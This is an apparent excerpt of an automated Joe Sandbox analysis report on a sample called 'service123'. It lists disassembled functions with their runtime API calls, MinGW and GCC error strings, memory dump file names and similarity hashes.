abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: 1479706bbaff09f4c3253506e2e0d00e92ceea2b9f1ddd5b27e37571b4d7fe1d
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: C5B01212FD9328C340003FAC04460B9F3385B033487007C00459733D010B00FCC98E57

Function 6C2FD6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: ca8bcc25fb516d436fec39f3d36311d7154fb6c291dbe8e4483d4614aaf5b769
Instruction ID: d43d2eaea1892d509426e850024aafd4467734489b052f93d6adf91a412a556e
Opcode Fuzzy Hash: ca8bcc25fb516d436fec39f3d36311d7154fb6c291dbe8e4483d4614aaf5b769
Instruction Fuzzy Hash: CC413870A4934A8FE310DF19C58075AFBE0EB89708F108D2EF9A9C7B51D375D8458B92

Function 6C2FD855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 3b9167e47a15b4b3b6ba29507877dc635dbadff9ec812bf82faed4492d23d70c
Instruction ID: d2eeb82173f58a7644916bfc64cf5b5da2066633c5a5dd0f84d01b922653f298
Opcode Fuzzy Hash: 3b9167e47a15b4b3b6ba29507877dc635dbadff9ec812bf82faed4492d23d70c
Instruction Fuzzy Hash: B2E06571A4835F4BD710EE68D085729BBB16B4230CF541858D99627942C365B85FCB42

Function 6C30C0E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C30C151
fwrite.MSVCRT ref: 6C30C1F8
fputs.MSVCRT ref: 6C30C215
fwrite.MSVCRT ref: 6C30C23E
fputs.MSVCRT ref: 6C30C25D
fwrite.MSVCRT ref: 6C30C28C
fwrite.MSVCRT ref: 6C30C2BE
abort.MSVCRT ref: 6C30C2C3
abort.MSVCRT ref: 6C3C6157
free.MSVCRT ref: 6C3C615F

Part of subcall function 6C2FA340: strlen.MSVCRT ref: 6C2FA3C5
Part of subcall function 6C2FA340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C30C1CC), ref: 6C2FA3E0
Part of subcall function 6C2FA340: free.MSVCRT ref: 6C2FA3EA

Strings

-, xrefs: 6C30C271
terminate called after throwing an instance of ', xrefs: 6C30C1F1
terminate called without an active exception, xrefs: 6C30C285
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C30C0F9

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: c275ebbf3aefb58543bb715cbd57f810a03e5e787dbd40c1430d95db476859aa
Instruction ID: 74ae6234b8768f5978a3483386e49aa484455402fbcaf0c1378a1dea0f45a962
Opcode Fuzzy Hash: c275ebbf3aefb58543bb715cbd57f810a03e5e787dbd40c1430d95db476859aa
Instruction Fuzzy Hash: D55148B26083149FDB00AF68C48979EBBF8AF85318F01891DE8D987741D7799488CF93

Function 6C2FD8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 21b9cf6b38df07e0bb664a4a1bc6e4f2ff3c8a391aeb88bd500ad3aefdba02e0
Instruction ID: 86906bc4719d1e96d27ede9aa7ea8afbb6ec36be5897091932c09c187f82788d
Opcode Fuzzy Hash: 21b9cf6b38df07e0bb664a4a1bc6e4f2ff3c8a391aeb88bd500ad3aefdba02e0
Instruction Fuzzy Hash: 68F089B1AA534E4FD310DF18C481775BBB07B43315F481854D8941BB42C3259899CB92

Function 6C2FDE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C2FDEB8

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: dde504998a7ae14c9df1ad4bca54c0d95ad93317ed066ff81a42c9b78974c5b4
Instruction ID: 8b7529e406f4bb53fb3d1686649899be06642ef4c8d0f29f0d229ec340333bc9
Opcode Fuzzy Hash: dde504998a7ae14c9df1ad4bca54c0d95ad93317ed066ff81a42c9b78974c5b4
Instruction Fuzzy Hash: 7921C371A4421E8BDB10DF54CC84BDDF7B8AB86319F1045A6DD29AB700E7309E8A8F80

Function 6C2FDA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 8665fd36f5d601daa6c2b86d63b85e68815cbed05eee4266615d0df51509bfa7
Instruction ID: a02c39761cde7326c6fbb7b2a3dd13ba30f77f24d26a8820f0a9233800076f39
Opcode Fuzzy Hash: 8665fd36f5d601daa6c2b86d63b85e68815cbed05eee4266615d0df51509bfa7
Instruction Fuzzy Hash: 7F413C75A4421D9BCB10DF58C880BDEF7B1AF89318F1489A9DC59A7700D730AE89CF91

Function 6C2FDCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 6b4bdc17a3d3c270ae3f63b8a5b4a53f4099ed420353aa187dc38dd826cb69b7
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: 9E111C75A4421C9BCB14DF68C8819DEB7B5AF85358F048964EC1967B01DB30AE4ACFE1

Function 6C2FDD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction ID: 9223bfef9ed01f955c0e964b65ebe6c27f03bf165ffdc3f667b6e892de2a223b
Opcode Fuzzy Hash: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction Fuzzy Hash: B5210675A0421E9BCF10DF64C8809DEF7B5AB89308F1088A8DD1967741DB30AE8ACF91

Function 6C300310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3C370F), ref: 6C30034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3C370F), ref: 6C300352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C3C370F), ref: 6C300360

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 366e659608ce5a7969ef58cbb62becbed610d6fae85d34ca4918fd216beac0ba
Instruction ID: 93b4c39d66b426c0f32843f6d2d1921b8dbee73df1769f12bb2338085ecf9d34
Opcode Fuzzy Hash: 366e659608ce5a7969ef58cbb62becbed610d6fae85d34ca4918fd216beac0ba
Instruction Fuzzy Hash: 4B516E767093418FCB01EF29C5C565ABBF5BB86308F15456CD88887B11EB32E845CF92

Function 00531940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 0053196F
vfprintf.MSVCRT ref: 0053198F
abort.MSVCRT ref: 00531994
VirtualQuery.KERNEL32 ref: 00531A2B

Strings

VirtualProtect failed with code 0x%x, xrefs: 00531AA6
VirtualQuery failed for %d bytes at address %p, xrefs: 00531AD7
Mingw-w64 runtime failure:, xrefs: 00531968
Address %p has no image-section, xrefs: 00531AEB

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 29ee44bf2eedc047a934ca3bc70ad4973a45d4911a8a93ae46cfd50e53af369a
Instruction ID: 9a44bf820c390fbe7bd066b30b8bfc28f15d5991f6b5520e55078f411d7249a7
Opcode Fuzzy Hash: 29ee44bf2eedc047a934ca3bc70ad4973a45d4911a8a93ae46cfd50e53af369a
Instruction Fuzzy Hash: 725157B19087018FC714EF29E88965AFFF0FF84754F45891DE8898B311E734E8499BA6

Function 6C2FA690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C2FA6BF
vfprintf.MSVCRT ref: 6C2FA6DF
abort.MSVCRT ref: 6C2FA6E4
VirtualQuery.KERNEL32 ref: 6C2FA77B

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 6C2FA827
Mingw-w64 runtime failure:, xrefs: 6C2FA6B8
Address %p has no image-section, xrefs: 6C2FA83B
VirtualProtect failed with code 0x%x, xrefs: 6C2FA7F6

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 613ecbfc6c8931a383a395ca9e6fe666519da7093d5ee003930705519ce464bb
Instruction ID: ab119b3f6a1233e27c6d6a01d09f2af0207bd8449565af50319722cd9cd7b65e
Opcode Fuzzy Hash: 613ecbfc6c8931a383a395ca9e6fe666519da7093d5ee003930705519ce464bb
Instruction Fuzzy Hash: 3A513AB2A493099FC700EF29C48565AFBF4BF85318F55891CE99887A50D734E84ACF92

Function 6C2FE0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bfb0bfcd2bbb98b3a27f3bdf0869197f06fb3f1bd837e748534f8eb9b0f68795
Instruction ID: c4e10b82b5c5ddb9697010f7e680f244c07e55cdfccefe095d5ea543084aa43e
Opcode Fuzzy Hash: bfb0bfcd2bbb98b3a27f3bdf0869197f06fb3f1bd837e748534f8eb9b0f68795
Instruction Fuzzy Hash: B8213B3238520D8BC704CF1CD881997B3A6EBC632872C817EE9588BB15D637A807C790

Function 6C2FE570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

